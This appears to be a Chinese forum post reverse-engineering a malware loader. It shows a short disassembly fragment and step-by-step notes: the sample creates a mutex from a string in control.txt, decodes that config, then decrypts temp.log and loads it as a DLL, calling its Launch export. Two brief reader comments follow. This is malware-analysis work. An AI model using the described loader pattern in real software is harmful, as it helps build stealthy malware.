100012B8                  |>  A1 F8AA0010   mov eax,dword ptr ds:[0x1000AAF8]
100012BD                  |.  3BC3          cmp eax,ebx
100012BF                  |.  74 09         je short 100012CA
100012C1                  |.  50            push eax
100012C2                  |.  E8 E9010000   call 100014B0
100012C7                  |.  83C4 04       add esp,0x4
; epilogue: reached only when the load or the export lookup failed
100012CA                  |>  5F            pop edi
100012CB                  |.  5E            pop esi
100012CC                  |.  5D            pop ebp
100012CD                  |.  5B            pop ebx
100012CE                  |.  81C4 14030000 add esp,0x314
100012D4                  \.  C3            retn



直接定位关键点 
(1) 读入文件目录下的control.txt
(2) 用读取的内容 N1hZMG9NTjhvVHwyMDk5MjA= 作为名字创建互斥体,如果互斥体已存在(GetLastError 返回 0xB7,即 ERROR_ALREADY_EXISTS),则关闭句柄并结束进程


(3) 将  N1hZMG9NTjhvVHwyMDk5MjA=   进行解密    解密的结果与刚开始猜测的一样
(4) 把解密后内容 7XY0oMN8oT|209920 以 "|" 进行分割,并将 7XY0oMN8oT 用 lstrcpyA 拷贝到 0x1000AB00



(5) 读入当前目录下的 temp.log 并进行解密,解密结果交给 100014B0 当作 DLL 加载,再取其导出函数 Launch 并调用



不明觉厉
2018-2-9 00:07
C&C部分没多少呀
2018-3-20 15:55